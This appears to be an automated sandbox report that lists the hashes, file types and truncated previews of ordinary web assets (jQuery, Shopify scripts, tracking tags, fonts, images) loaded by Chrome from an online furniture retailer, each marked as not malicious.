                                                                                                                                                                                    MD5:5828BC58662DF552EAC51592D9A4BBE1
                                                                                                                                                                                    SHA1:D8642F1A7D5472F383260831B6591C436AB7872A
                                                                                                                                                                                    SHA-256:97D46D9FCA545D7ECC9FC81E71A3C3168EE2DAFEB86E051168772D2E8A2FDC67
                                                                                                                                                                                    SHA-512:0A0529A03AE6B065FF94B683508B4B1BED818FD06C3672CAB0F7BC2A289F8F7E91E2CAFC2C86B3DB1FE4E93FC61AECD49EE80C553A6153102548EEBED9C5E913
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:!function e(t,i,n){function r(s,o){if(!i[s]){if(!t[s]){var l="function"==typeof require&&require;if(!o&&l)return l(s,!0);if(a)return a(s,!0);var u=new Error("Cannot find module '"+s+"'");throw u.code="MODULE_NOT_FOUND",u}var c=i[s]={exports:{}};t[s][0].call(c.exports,function(e){var i=t[s][1][e];return r(i||e)},c,c.exports,e,t,i,n)}return i[s].exports}for(var a="function"==typeof require&&require,s=0;s<n.length;s++)r(n[s]);return r}({1:[function(e,t,i){(function(i){e("./utils/polyfills");var n=e("./strategies/LocalVisitor"),r=e("./strategies/ProxyVisitor"),a=e("./strategies/PlaceholderVisitor"),s=e("./utils/callbackRegistryFactory"),o=e("./Message"),l=e("./enums"),u=l.MESSAGES;t.exports=function(e,t,l,c){function d(e){Object.assign(I,e)}function f(e){Object.assign(I.state,e),I.callbackRegistry.executeAll(I.state)}function g(e){if(!A.isInvalid(e)){v=!1;var t=A.parse(e);I.setStateAndPublish(t.state)}}function _(e){!v&&C&&(v=!0,A.send(c,e))}function m(){d(new n(l._generateID)),I.getMarket
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2893
                                                                                                                                                                                    Entropy (8bit):7.276409903574176
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:NBIl/XflVxL9qrOZWO47ulO3N39+xl/vz7p34nK+naNRMh4Gh:NBIl/XrxLcrO/4Pb+xlnzF39+naNRjy
                                                                                                                                                                                    MD5:388E5785339B9ABDB44B3014B5096FD8
                                                                                                                                                                                    SHA1:2EF8DE9A5CD9994DC62CE927E5FB40A6A3C054F3
                                                                                                                                                                                    SHA-256:F844E0E614638678E09A6A18144844E5AB2564ACF717BAD14966798D3FDF86DC
                                                                                                                                                                                    SHA-512:86237E9479935D5363126E019D07DA2EFB7E84C9B0653530916B90668EC3FB7C340EF4E61043D5291C9B55F3B134FD9745B3767A34F296936BD3F02E474AD48F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P..................................................................................`....yo7.+b}$.e......=~.....)<.|..%[H.e.^..I}?..g,..?;fJ.^.....S._.f..._;a.l.s..*.[.5..e.fg..{?Q.o.h..u.....i...|..?V>..24..0u
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (65451)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):89476
                                                                                                                                                                                    Entropy (8bit):5.2896589255084425
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:AjExXUqrnxDjoXEZxkMV4SYSt0zvDD6ip3h8cApwEjOPrBeU6QLiTFbc0QlQvakF:AYh8eip3huuf6IidlrvakdtQ47GK1
                                                                                                                                                                                    MD5:DC5E7F18C8D36AC1D3D4753A87C98D0A
                                                                                                                                                                                    SHA1:C8E1C8B386DC5B7A9184C763C88D19A346EB3342
                                                                                                                                                                                    SHA-256:F7F6A5894F1D19DDAD6FA392B2ECE2C5E578CBF7DA4EA805B6885EB6985B6E3D
                                                                                                                                                                                    SHA-512:6CB4F4426F559C06190DF97229C05A436820D21498350AC9F118A5625758435171418A022ED523BAE46E668F9F8EA871FEAB6AFF58AD2740B67A30F196D65516
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js
                                                                                                                                                                                    Preview:/*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"o
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):24
                                                                                                                                                                                    Entropy (8bit):2.459147917027245
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:CUXJ/lH:Dl
                                                                                                                                                                                    MD5:BC32ED98D624ACB4008F986349A20D26
                                                                                                                                                                                    SHA1:2D3DF8C11D2168CE2C27E0937421D11D85016361
                                                                                                                                                                                    SHA-256:0C9CF152A0AD00D4F102C93C613C104914BE5517AC8F8E0831727F8BFBE8B300
                                                                                                                                                                                    SHA-512:71ACC6DA78D5D5BF0EEA30E2EE0AC5C992B00EFEC959077DFE0AB769F1DBBD9AF12D5C5C155046283D5416BEB606A9EF323FB410E903768B1569B69F37075B4E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:GIF89a.......,..........
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):288980
                                                                                                                                                                                    Entropy (8bit):5.570284177398845
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6144:xs64Ta8tw4dTJYFzGCCMAItkdE4JqSaRd:xs6X8tzYF6ktmJJqSaRd
                                                                                                                                                                                    MD5:89A171AE81F27EE11A3A630848F6BF47
                                                                                                                                                                                    SHA1:F569DF7F0E1F75C275217853D4AA691F547E4721
                                                                                                                                                                                    SHA-256:2D74772A0CA25E96F432C18DB88A5968B73CAF1D87797D297B87FBEB83DD4EBE
                                                                                                                                                                                    SHA-512:A9E5DB4E1CC44BE0D46D4950E367A8599BC9EF38C4714E77342DB93E3D4EC4746850BAD67F87BE013B46B74CD9AEF55824633CECB64ECA23FD6C85872DF4022D
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:!function(){"use strict";try{if(typeof document<"u"){var e=document.createElement("style");e.appendChild(document.createTextNode("[id^=product-rating-snippet] .p-w-r .pr-snippet{display:flex;align-items:center}[id^=product-rating-snippet] .p-w-r .pr-snippet .pr-snippet-rating-decimal{display:none}[id^=product-rating-snippet] .p-w-r .pr-snippet .pr-rating-stars,[id^=product-rating-snippet] .p-w-r .pr-snippet .pr-category-snippet__item{display:flex}[id^=product-rating-snippet] .p-w-r .pr-snippet .pr-category-snippet__item{height:12px}[id^=product-rating-snippet] .p-w-r .pr-snippet .pr-category-snippet__total{color:#545658;font-size:12px;font-weight:420;line-height:1;top:0;font-family:belltown-regular,ui-sans-serif,system-ui,-apple-system,Segoe UI,Roboto,Ubuntu,Cantarell,Noto Sans,sans-serif}[id^=product-rating-snippet] .p-w-r .pr-snippet .pr-snippet-stars-png .pr-star-v4.pr-star-v4-0-filled,[id^=product-rating-snippet] .p-w-r .pr-snippet .pr-snippet-stars-png .pr-star-v4.pr-star-v4-25-fi
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (9712)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):9713
                                                                                                                                                                                    Entropy (8bit):5.234912191106589
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:l5Y2EWUESSsoEeek1JpdrEda0nIgJpI1ik8c/oUrlzO3wpBgnHcL:lqdWjSSso/FrEdawDJpuH8orlzO3wbeO
                                                                                                                                                                                    MD5:51257EADCB7607614405EF1015D34511
                                                                                                                                                                                    SHA1:741E2A2CBF49658F4B00E46A89DAA084158B7005
                                                                                                                                                                                    SHA-256:E0B8CC3E0B1F2BD8DBE168FB1363E70222DF971EA8498D6EB1127EB371264233
                                                                                                                                                                                    SHA-512:BF82DD8869485DA8A7AF06B36E763FC51EE9C1F20BD4E1A63BFDEAA3D986237D6C75A2EC186F346CB9786DEE6ED2A934E28406CA69523AC809F497EA761D41CC
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/hooks.CJ9fMJ3B.js
                                                                                                                                                                                    Preview:import{al as $e,dS as ue,q as k,fo as b,fp as we,fq as xe,fr as Ie,fs as ce,ft as de,T as q,fu as j,cc as G,r as ke,h as I,l as qe,v as Te,fv as Fe,cp as Ce,fc as Pe,m as ze,fw as Le,fh as De,u as Me,fx as Oe,cM as oe,p as M,fy as Re,y as O}from"./app.DfgMZONA.js";function Ue(e){const t=$e(),{geolocation:s}=ue();return k(async(n,u,d)=>{const o=await e(n,u,d);return t.histogram({name:"prediction_duration",value:o.duration.end-o.duration.start,attributes:{buyerCountry:s.country.code}}),o.data},[e,t,s.country.code])}function Ne(e){if(typeof e!="object")throw new b(`formattedAddress must be an object: received type ${typeof e}`);const t=ae(e);if(t.length)throw new b(t.join("; "));return e}function _e(e){const t=[];if(!Array.isArray(e))throw new b("An array of address suggestions must be defined");const s=e.slice(0,5);for(const[n,{id:u,label:d,matchedSubstrings:o,formattedAddress:i}]of s.entries()){if(S(d)||t.push(`label is required and must be a non-empty string: received ${typeof d} in su
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (18850)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):18865
                                                                                                                                                                                    Entropy (8bit):5.187115085468122
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:gggIoLxpxNRGwUhJB95bFH8dUT+RCgsxZ26Cm168ePJLakOQKq3:8Lxb3hEJBPNsRseFP
                                                                                                                                                                                    MD5:9C5D1B58EE551D992D10FED3A5972EB9
                                                                                                                                                                                    SHA1:26596A5222F80A3E544B283B112D05479FE16ACA
                                                                                                                                                                                    SHA-256:2FAEE16B7095F268D3A3B7A7F912CB02D370C5E582C6AAC28DA24AAFEC87EC61
                                                                                                                                                                                    SHA-512:9A2A747C6810D71860EE3698B6061A7A35B6A1CD7BFADA5A2F263215FE2C8B64545AB086FB690B8C1713954E7B56F28A5C43D75ED87F3A2884BF4E781BE825DD
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:!function(){"use strict";var e,t=function(){return window.performance&&performance.getEntriesByType&&performance.getEntriesByType("navigation")[0]},n=function(e){if("loading"===document.readyState)return"loading";var n=t();if(n){if(e<n.domInteractive)return"loading";if(0===n.domContentLoadedEventStart||e<n.domContentLoadedEventStart)return"dom-interactive";if(0===n.domComplete||e<n.domComplete)return"dom-content-loaded"}return"complete"},r=function(e){var t=e.nodeName;return 1===e.nodeType?t.toLowerCase():t.toUpperCase().replace(/^#/,"")},o=function(e,t){var n="";try{for(;e&&9!==e.nodeType;){var o=e,i=o.id?"#"+o.id:r(o)+(o.classList&&o.classList.value&&o.classList.value.trim()&&o.classList.value.trim().length?"."+o.classList.value.trim().replace(/\s+/g,"."):"");if(n.length+i.length>(t||100)-1)return n||i;if(n=n?i+">"+n:i,o.id)break;e=o.parentNode}}catch(e){}return n},i=-1,a=function(){return i},s=function(e){addEventListener("pageshow",(function(t){t.persisted&&(i=t.timeStamp,e(t))}),!
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 36948, version 1.0
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):36948
                                                                                                                                                                                    Entropy (8bit):7.994414428838672
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:768:LutyLfyUaQv8u03JPjcqt+4r5wkWTdCR+E0ag5Qv3XBbXSVu:ityLfni3JA14rukyK0f5+3RLF
                                                                                                                                                                                    MD5:E2BF2A0E0B18B38B4BB2155A3848F110
                                                                                                                                                                                    SHA1:02D847743BF199F677237B82F8063C4579CFAF3C
                                                                                                                                                                                    SHA-256:7E0DD1724A104CCC64464FB0014E8CB7B2FEA9DF4E486883D6926492D8A37C46
                                                                                                                                                                                    SHA-512:A1FE8834BF6992DF0D3B001029CAE1BE23BA9CAE8AE4EF92E4E6BCF9F9D1A28B59817C24828E313169E4F889F72A8F2CC9F99A1BE250C7C59AB1B4249F22B673
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/s/files/1/0874/3659/1420/files/belltown-book-webfont_1b49c658-4cb6-4d6f-9d2b-52d7a1b0be63.woff?v=1719592872
                                                                                                                                                                                    Preview:wOF2.......T...................................?FFTM..*..*..>.`..V.B..e.....`..5..f..6.$..H. ..$..k..4?webf.[R.q.:w..Z..Z.Y.J.Y.6.....u....+.M.n.....G....y..u.;.6u.V..*f.y0....D.]x."1..l......V....4C.ix.s...6..<5.u\...]z....<..O....3C~J|..}.(.K?j....p..........Sl.1.t%.&J.w..h.PkLp.M.m.ro...9....y.p.am...~.a.H....}.}.m.>j...:u.0C}..}.$.Y..cs..m...........U{.6..>~..B9.......g..!F...1#..;$..I..b..1W..1f.P..............D..L.x.....;Ut..|...Aw...jf....M..$9..)..3.{.oSck...I..N...8....r.#~...\.......Z.e.U....V..C...D#..<.pp..._..A...D0.`L y...Rv*j.M....r..Ma..:..f..W...Z....%..|"G.....Xt..w..,.../i.)...l..@.&@..n_J.0g.3%..=.-.;.?..n..J.._.}.........u.N...B...0hPp....h/.~.i...y...=.....v~`.....e.......6.O.G.:........K.L....F]N.0..C.c;]d..O..+U..c4..u.v...&.<.0. ......BAV.9.$K..-..CM..t..|.....~o6[j.v"....qp.^.7......[..y0+. K..S.)zc.`.......mRT..Eg_..e...~...o.Uz..U..%..FsD...A..(.c].o..*..~.@.. ...HJ.&.9.)..4.(....=.X.W.q^.....6.7.9.e.A.<.w....c....k.....
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):545
                                                                                                                                                                                    Entropy (8bit):4.972811279040273
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:t4Ix4Ff4oS0peb6/iHrgv2Vn2dlSxgRsJS3ewfRinKM77:t4I69XS0peW/igv2V2dlmggS3wnKMn
                                                                                                                                                                                    MD5:2BCF55B7A6BC310149E843449377B0CE
                                                                                                                                                                                    SHA1:743463645AA5ED1D244395EF248561FEB51B95AF
                                                                                                                                                                                    SHA-256:21AFF1C48B459F1853E033832ED9137558672180B4943F0822AFA9ADFE1B9DA8
                                                                                                                                                                                    SHA-512:6F148E4E80805B5FBA1460DCEF1EE420A7C09A594EC2B7EA1149A8A047FC12D3B8603D7C0ED5A1E7D9126CCBA4C4C7390E8F64492F14A271FFDB1FAB9D077D77
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/OSTK_Icon_Favicon.svg?crop=center&height=48&v=1711043027&width=48
                                                                                                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 96 96" height="96" width="96">.<path fill="#D90023" d="M0 8C0 3.58172 3.58172 0 8 0H88C92.4183 0 96 3.58172 96 8V88C96 92.4183 92.4183 96 88 96H8C3.58172 96 0 92.4183 0 88V8Z"></path>.<path fill="white" d="M80 29.4855L63.8421 38.7427V56.6403L47.6853 66.3085L32.1579 57.2573V74.9488L47.6853 84L80 65.6915V29.4855ZM48.3147 29.6915L63.8421 38.7427V21.0512L48.3147 12L16 30.3085V66.5135L32.1568 57.2562V39.3597L48.3147 29.6915Z" clip-rule="evenodd" fill-rule="evenodd"></path>.</svg>.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (5384)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):5483
                                                                                                                                                                                    Entropy (8bit):4.982000193751864
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:VElu8Zk3W/KEMW9RjoCG9x2hBUiSBFpH5qikGUUU/GA4dTFvVS8:VElu8Zk3o9Rjgx2hByTUUUuS8
                                                                                                                                                                                    MD5:0A3C64D5C5A582896EAFA33F1F16C674
                                                                                                                                                                                    SHA1:6873A7B19AD1E1685466780598928970664942A6
                                                                                                                                                                                    SHA-256:884818CE59CC9CDAD470C29D74BC1A9E22ACA597FB70C0D21B8744EEDE259677
                                                                                                                                                                                    SHA-512:A2255BCA75F0A7B9440831E8ADED8BCA74C56472ECF243EC7B1E0148BCDDD441621D6DFB7DB66E321FFD3BB6AFE691D8E1A6DBE92784626D1EC62B2BCAACAA5A
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/t/224/assets/cart-items.css?v=91900140668399919651730157903
                                                                                                                                                                                    Preview:.free-shipping__notice{margin-bottom:0}.free-shipping-container{margin:calc(6 * var(--space-unit) * -1) 0;padding:calc(8 * var(--space-unit))}.free-shipping-container.color-scheme{--btn-bg-color: var(--heading-color);margin-bottom:calc(6 * var(--space-unit));padding:calc(6 * var(--space-unit)) calc(8 * var(--space-unit))}cart-drawer .free-shipping-container{margin:calc(var(--gutter) * -1) calc(var(--gutter) * -1) 0}.cart .free-shipping-container:not(.color-scheme){margin:0 0 calc(12 * var(--space-unit));padding:0}.free-shipping-notice__bar{height:8px;border-radius:var(--btn-border-radius);background-color:rgba(var(--text-color)/.2)}.free-shipping-notice__bar:after{content:"";display:block;width:var(--progress);height:100%;transition:width .3s ease-out;border-radius:var(--btn-border-radius);background-color:rgb(var(--btn-bg-color))}cart-items{position:relative}.cart-items tr{border-bottom:1px solid rgba(var(--text-color)/.15)}.cart-items td{border:0;vertical-align:top}.cart-item{grid-te
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:gzip compressed data, was "main.97c41ef3.js", last modified: Fri Aug 23 15:57:59 2024, from Unix, original size modulo 2^32 83598
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):27512
                                                                                                                                                                                    Entropy (8bit):7.993187350119009
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:768:CsfAgqyshviKsrws/XBA/GaFemZwlZwwjBBJKaduJDp:jogqyshv/srwgoGaFN23jP4wiN
                                                                                                                                                                                    MD5:0304D337D72A7B17907261BF86E2F221
                                                                                                                                                                                    SHA1:D56F37B6686036EE3945D877BAF2849245073FCE
                                                                                                                                                                                    SHA-256:F8501D2AAB7B556B8D8A56E8F7C6E9E21D01204249AC6D43470015AA86E2A5A7
                                                                                                                                                                                    SHA-512:6D15FC21EFD7CB6BDD2924CB9C16E1B8ABF070AFBA1C63B7FAF998A1CB7ACB3A0CAD5F52EC27EE8763328669F40AD50CA32D62A2E94AF4073218C5DC4B79FFA3
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://s.pinimg.com/ct/lib/main.97c41ef3.js
                                                                                                                                                                                    Preview:.......f..main.97c41ef3.js..\.o...*...b%...8.,.h{3`.[;,.... Pl:..Py..47.>.;..%..4....D......?.C.`Y.HRn3.p.g..>l.....B5.i.D.q;;...)^.$..:<.]..&.D.>l...G.y.^.|X......7kz...M....pN3....2./..d..%.l>_...b.`.._..e.^v{`..fY|.f!..b"d[..z.A.<X.Wo/..*.oX...__..~_....Td...._..]#..u.]../.X3kK......<.R.(..8....E...Nl`.{..D..,.<..S+.#XTO........."2ZB.g,....zM......(s-h....v...s.c q..5K9Y..-........2.\....f;.L.B.r3BJ..1d.o,..I.c.a1..T..$..6ly....w....r9..6.z...M....6\...;.y..._@.7.....S.'[.. ..........lz.;.....O....#......J..._...._..................|4>.M.G.......q0.V./..`.R.Xe.]....o1.b'Y..f..au.E.....Y...._..U-L..H........J...Br..j>...V............((A.{UY..}`....U....".s....t@.W$P.-..K...ZiVf#...Z.v.`..4..=.......B~...2.......L.\.'.@...].pw.zq..^..(.'..3.........4)L.,....<-.UT^.).XD.x...e`ML..O..&T..r.......{.~.......-Q.!s...2g..20-D.F.L.Xn.].Q...f..RJ.ZI.lN.m......~u..v.7%.#....m.Pn.v$4....v..M........>gT...0....Y%.).6s;+......vA.v.d.Z...p...C....x..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (5945)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):328290
                                                                                                                                                                                    Entropy (8bit):5.578096813724218
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6144:q4dKGbgBucoSk2639cM8Gp/e29itu9BW24n1B:zd7cucoSmiAEv
                                                                                                                                                                                    MD5:8D6F0504993749225951C5261694C34E
                                                                                                                                                                                    SHA1:1BCD6F4909587BB85ACA45A707EF85239E05BE7C
                                                                                                                                                                                    SHA-256:CA10712E50D909BF5491D55CC8BA96F3B571707AB64F7B6F737E6A30D149FD9F
                                                                                                                                                                                    SHA-512:8CF7CC47CA42E143DD00B04782593E908F05FF5C7F4FE426E4B6768CF3DF196521EBCA383335B8E026F7A6684B44D7011A6A08A324FD733299052AF67DA9EA24
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_1p_data_v2","priority":13,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddressEnabled":false,"vtp_regionValue":"","vtp_countryValue":"",
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):24
                                                                                                                                                                                    Entropy (8bit):2.459147917027245
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:CUXJ/lH:Dl
                                                                                                                                                                                    MD5:BC32ED98D624ACB4008F986349A20D26
                                                                                                                                                                                    SHA1:2D3DF8C11D2168CE2C27E0937421D11D85016361
                                                                                                                                                                                    SHA-256:0C9CF152A0AD00D4F102C93C613C104914BE5517AC8F8E0831727F8BFBE8B300
                                                                                                                                                                                    SHA-512:71ACC6DA78D5D5BF0EEA30E2EE0AC5C992B00EFEC959077DFE0AB769F1DBBD9AF12D5C5C155046283D5416BEB606A9EF323FB410E903768B1569B69F37075B4E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:GIF89a.......,..........
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):3053
                                                                                                                                                                                    Entropy (8bit):7.341887202108756
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:NBIl/XflVxdnEYgkpBkujVkXiCOk4OzAyhqTC49HouEgqpM1B5UvXOTVgzg:NBIl/XrxdnZgLuKcjOzKm49HouE9pqBz
                                                                                                                                                                                    MD5:91DEDBEE343B5AF640E46291E4AF51FB
                                                                                                                                                                                    SHA1:7BB84A531046C8FCD876C4E1071E99CE9C647CE4
                                                                                                                                                                                    SHA-256:B77C487D3E0BCA609B4D8CB293BDE3C55412742C78AE74D05F1FC089A870ADA7
                                                                                                                                                                                    SHA-512:21FEA325FD476849D901065B3A6B418E258B3C48B0CD649893E7E95C6F398B31F736A0AFE24ABEC7C76DE4EAAA39E036FB84A12C3484EEC3A8625CF407D74D74
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P...................................................................................|................Fz..v......Y..Z.ht..0.t....E:.3_...w7.|....m..a.L.....s.(.._\:.)......u...lZ9.A..$.hS..H....WJ...h.kc.T.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1162
                                                                                                                                                                                    Entropy (8bit):6.106059234216218
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:QETCIl/X2YlXWI2PUnEy24u5qmqjzKXatsXoGFXUWY9:QBIl/XflNEZ4PhKqOXPUWa
                                                                                                                                                                                    MD5:FF190D42EF6BB921F02FCB5AF1DBC8F0
                                                                                                                                                                                    SHA1:EB63AE5AE69151AD777B5562EEB131E672D6BD08
                                                                                                                                                                                    SHA-256:F99DEFC1D73DAD891CD019E89092C1078D1638B66AD0B064A557BFA90A6CD5EA
                                                                                                                                                                                    SHA-512:226050DA999990861C252F7E99C52191508A1AABD2EA9874305891C98EF999DB59EAE8A59385E7B5214987AA13FA24C96D0E9716ED0D9FE6BDF66D307FBC8FFA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_c95e0049-d2d3-44cf-9860-b7d3bdc6117d.jpg?v=1729322906&width=80
